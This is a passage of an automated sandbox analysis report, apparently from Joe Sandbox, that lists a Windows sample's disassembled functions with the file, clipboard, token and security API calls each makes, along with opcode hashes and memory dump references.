                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                  • Instruction ID: a15bc021dcca1087f9e1742b3f51fd2d15614157efc32d60ae4b64008134d39f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF0F87550020DFFDF05DF94C941E9E7B79FB04358F208445F9159A251C336EA21ABA1
                                                                                                                                                                                                                                  Function 00993907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00993963
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                  • Opcode ID: a3f57b41c5a3842ec934394c79462abe09bb13de8e78e6e8e0d3710ee2978368
                                                                                                                                                                                                                                  • Instruction ID: 22d6e2b8950d7cd18876dfdc4f0bedf9170abfb0a5eabdf0664e6271fbd4e92d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3f57b41c5a3842ec934394c79462abe09bb13de8e78e6e8e0d3710ee2978368
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F037709143149FEB52DF68DC4A7D57BBCA70170CF0041A5E6449A282D7B45789CF51
                                                                                                                                                                                                                                  Function 00993A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00993A76
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 541455249-0
                                                                                                                                                                                                                                  • Opcode ID: 0e9d2daa5ea85739aeeea0c831fb5f2666b59398245dbfa3b7d1be1f9881ffc3
                                                                                                                                                                                                                                  • Instruction ID: dacee425c910bfaa96206d22267da07adffaa567bcb30bfeda36f638d9212ba9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e9d2daa5ea85739aeeea0c831fb5f2666b59398245dbfa3b7d1be1f9881ffc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E0C272A002245BCB20E39C9C06FEA77EDDFC87A0F0540B5FD09D7258E960ED858690
                                                                                                                                                                                                                                  Function 009D071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,009D0A84,?,?,00000000,?,009D0A84,00000000,0000000C), ref: 009D0737
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: b66757ac5ac2db951a775cd571f5fe59f7a2087dfa42ff665d345e4a7d57c124
                                                                                                                                                                                                                                  • Instruction ID: c5c72a1ffd791024f6b369ca1f91b45a284b5ed392e6142daa335ff7d069fc67
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b66757ac5ac2db951a775cd571f5fe59f7a2087dfa42ff665d345e4a7d57c124
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98D06C3200010DBBDF128F84DD06EDA3BAAFB48714F014110BE1856020C732E832AB90
                                                                                                                                                                                                                                  Function 009FEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 435e103c5393a5fe9ae003334c5a84904d1cbc4d7ee7b38a4b00b34a7d0b40b6
                                                                                                                                                                                                                                  • Instruction ID: 86abe82bb33092c2dcff905b2786936f63da5172dc7966056e0b64b036f1ccec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 435e103c5393a5fe9ae003334c5a84904d1cbc4d7ee7b38a4b00b34a7d0b40b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95B09234000A0445AD288A3C5A09DB9330C78523A67EC1BC0E579854F2D339C80FAB50
                                                                                                                                                                                                                                  Function 00A0664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FDC54: FindFirstFileW.KERNEL32(?,?), ref: 009FDCCB
                                                                                                                                                                                                                                    • Part of subcall function 009FDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDD1B
                                                                                                                                                                                                                                    • Part of subcall function 009FDC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDD2C
                                                                                                                                                                                                                                    • Part of subcall function 009FDC54: FindClose.KERNEL32(00000000), ref: 009FDD43
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A0666E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2191629493-0
                                                                                                                                                                                                                                  • Opcode ID: 8fe9c5deee6f265d6d77a1b1c7305c7f7a96c21f9f3c61cd47e174e872f269c6
                                                                                                                                                                                                                                  • Instruction ID: 82ed1d376b843746fd6c244222e97bd6ace3f1bbd0919b2bd1e3baf974a7fcbb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fe9c5deee6f265d6d77a1b1c7305c7f7a96c21f9f3c61cd47e174e872f269c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F0A0366102049FCB14EF9CD855B6EB7E9AFC8320F048419F9498B352CB75BC02CB90

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 009F1B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009F205A
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009F2087
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: GetLastError.KERNEL32 ref: 009F2097
                                                                                                                                                                                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009F1BD2
                                                                                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009F1BF4
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009F1C05
                                                                                                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009F1C1D
                                                                                                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 009F1C36
                                                                                                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 009F1C40
                                                                                                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009F1C5C
                                                                                                                                                                                                                                    • Part of subcall function 009F1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009F1B48), ref: 009F1A20
                                                                                                                                                                                                                                    • Part of subcall function 009F1A0B: CloseHandle.KERNEL32(?,?,009F1B48), ref: 009F1A35
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                                                                                                  • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                  • Opcode ID: 8fb0bd083238ed370afefaf70cec3194095454663363518228fddff740b3956b
                                                                                                                                                                                                                                  • Instruction ID: e043ab62c076bfa12a25b813df49b68c63cb674beee61ecfc88f18bc0b5e25f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fb0bd083238ed370afefaf70cec3194095454663363518228fddff740b3956b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F81447190020DABDF21DFA8DC49FFE7BB8EF48304F144129FA15A61A1D7758A56CBA0
                                                                                                                                                                                                                                  Function 009F14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009F1518
                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009F154C
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F1563
                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009F159D
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009F15B9
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F15D0
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009F15D8
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F15DF
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009F1600
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009F1607
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009F1636
                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009F1658
                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009F166A
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F1691
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F1698
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F16A1
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16A8
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F16B1
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16B8
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F16C4
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F16CB
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: GetProcessHeap.KERNEL32(00000008,009F14FD,?,00000000,?,009F14FD,?), ref: 009F1AED
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009F14FD,?), ref: 009F1AF4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009F14FD,?), ref: 009F1B03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                  • Opcode ID: a9bd6db2eefd8adb18e529f81699d07454a7549f86b17e86e663a8d8d21b06fc
                                                                                                                                                                                                                                  • Instruction ID: 9ce22bbac53754d39731a1ede55b8f6a88a884217a37a7a75f59620f6ebbdb10
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9bd6db2eefd8adb18e529f81699d07454a7549f86b17e86e663a8d8d21b06fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8713AB2900209EBDF10DFA5DC49FBEBBBCBF44351F184625EA15E61A1D7319906CBA0
                                                                                                                                                                                                                                  Function 00A0F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32(00A2DCD0), ref: 00A0F586
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A0F594
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00A0F5A0
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F5AC
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F5E4
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F5EE
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A0F619
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00A0F626
                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00A0F62E
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F63F
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?), ref: 00A0F67F
                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A0F695
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000F), ref: 00A0F6A1
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00A0F6B2
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A0F6D4
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A0F6F1
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A0F72F
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00A0F750
                                                                                                                                                                                                                                  • CountClipboardFormats.USER32 ref: 00A0F771
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00A0F7B6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420908878-0
                                                                                                                                                                                                                                  • Opcode ID: aa7c39d99256ea0ea9e1c67cd57d15e1cccfb7fe55d800527130cfe4c807c069
                                                                                                                                                                                                                                  • Instruction ID: eb4667aecefd7ffbb3f354054a58e06fbf8805b13c3c7e0b16c7a12a75edff52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7c39d99256ea0ea9e1c67cd57d15e1cccfb7fe55d800527130cfe4c807c069
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F61D031204305AFD720EF68EC85F7AB7A4AF84708F14456DF446976E2DB31E946CBA2
                                                                                                                                                                                                                                  Function 00A073D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00A07403
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A07457
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A07493
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A074BA
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A074F7
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A07524
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                  • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                  • Opcode ID: 08732a5d3d0da7ce09b142bd7bfacdcc1cead359df88564f81ee35d2c12df3ae
                                                                                                                                                                                                                                  • Instruction ID: 98cb1bd7b54df5063067428e4d6e1479d5aadcecd2a8cf5e9b2611a324880ea5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08732a5d3d0da7ce09b142bd7bfacdcc1cead359df88564f81ee35d2c12df3ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AD162B1508304AFC710EBA8C855EBFB7ECAF89704F44491DF589D6192EB74EA44C762
                                                                                                                                                                                                                                  Function 00A0A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A0A0A8
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00A0A0E6
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00A0A100
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00A0A118
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A123
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00A0A13F
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A0A18F
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00A57B94), ref: 00A0A1AD
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0A1B7
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A1C4
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A1D4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
